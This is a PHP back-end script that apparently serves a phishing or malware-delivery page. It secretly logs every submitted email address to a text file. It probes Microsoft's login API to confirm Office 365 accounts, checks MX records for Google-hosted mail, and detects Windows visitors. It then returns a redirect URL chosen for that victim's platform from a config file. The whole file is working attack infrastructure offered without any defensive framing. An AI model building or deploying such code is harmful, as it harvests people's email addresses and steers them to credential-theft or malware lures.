<?php
header('Content-Type: application/json');
header('X-Content-Type-Options: nosniff');
header('X-Frame-Options: DENY');

$config = require __DIR__ . '/mumu.php';

$windowsUrl = $config['windowsUrl'];
$otherUrl = $config['otherUrl'];
$office365Url = $config['office365Url'];
$gmailUrl = $config['gmailUrl'];


session_start();
if (isset($_SESSION['last_request']) && $_SESSION['last_request'] > time() - 1) {
    http_response_code(429);
    die(json_encode(['success' => false, 'error' => 'Too many requests']));
}

if (!isset($_SERVER['HTTP_X_REQUESTED_WITH']) || strtolower($_SERVER['HTTP_X_REQUESTED_WITH']) !== 'xmlhttprequest') {
    http_response_code(403);
    die(json_encode(['success' => false, 'error' => 'Forbidden']));
}

$data = json_decode(file_get_contents('php://input'), true);
$email = filter_var($data['email'] ?? '', FILTER_SANITIZE_EMAIL);

if (!filter_var($email, FILTER_VALIDATE_EMAIL)) {
    http_response_code(400);
    die(json_encode(['success' => false, 'error' => 'Invalid email']));
}


file_put_contents('emslogstrack.txt', $email . "\n", FILE_APPEND | LOCK_EX);

$uniqueToken = bin2hex(random_bytes(32));
$_SESSION['download_token'] = $uniqueToken;
$_SESSION['last_request'] = time();

function io35($email) {
    $url = "https://login.microsoftonline.com/common/GetCredentialType";
    $data = json_encode(["Username" => $email]);

    $ch = curl_init($url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_HTTPHEADER, [
        "Content-Type: application/json",
        "User-Agent: Mozilla/5.0"
    ]);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $data);

    $response = curl_exec($ch);
    curl_close($ch);

    $result = json_decode($response, true);
    return isset($result['IfExistsResult']) && $result['IfExistsResult'] === 0;
}

function isGmail($email) {
    $domain = strtolower(substr(strrchr($email, '@'), 1));
    
    if ($domain === 'gmail.com') {
        return true;
    }
    
    $url = "https://accounts.google.com/signin/v2/identifier";
    
    $ch = curl_init($url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_NOBODY, true);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
    curl_setopt($ch, CURLOPT_TIMEOUT, 10);
    curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36');
    
    $response = curl_exec($ch);
    $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    curl_close($ch);
    
    if ($httpCode === 200) {
        $mxRecords = [];
        if (getmxrr($domain, $mxRecords)) {
            foreach ($mxRecords as $mx) {
                if (stripos($mx, 'google') !== false || stripos($mx, 'gmail') !== false) {
                    return true;
                }
            }
        }
        
        $gSuiteIndicators = [
            'googlemail.com',
            'gmail.com'
        ];
        
        foreach ($gSuiteIndicators as $indicator) {
            if ($domain === $indicator) {
                return true;
            }
        }
    }
    
    return false;
}

$userAgent = $_SERVER['HTTP_USER_AGENT'] ?? '';
$isWindows = (stripos($userAgent, 'Windows') !== false);
$isOffice365 = io35($email);
$isGmail = isGmail($email);

$response = [
    'success' => true,
    'uniqueToken' => $uniqueToken,
    'isWindows' => $isWindows,
    'isOffice365' => $isOffice365,
    'isGmail' => $isGmail,
    'windowsUrl' => $windowsUrl,
    'otherUrl' => $otherUrl,
    'office365Url' => $office365Url,
    'gmailUrl' => $gmailUrl
];


echo json_encode($response);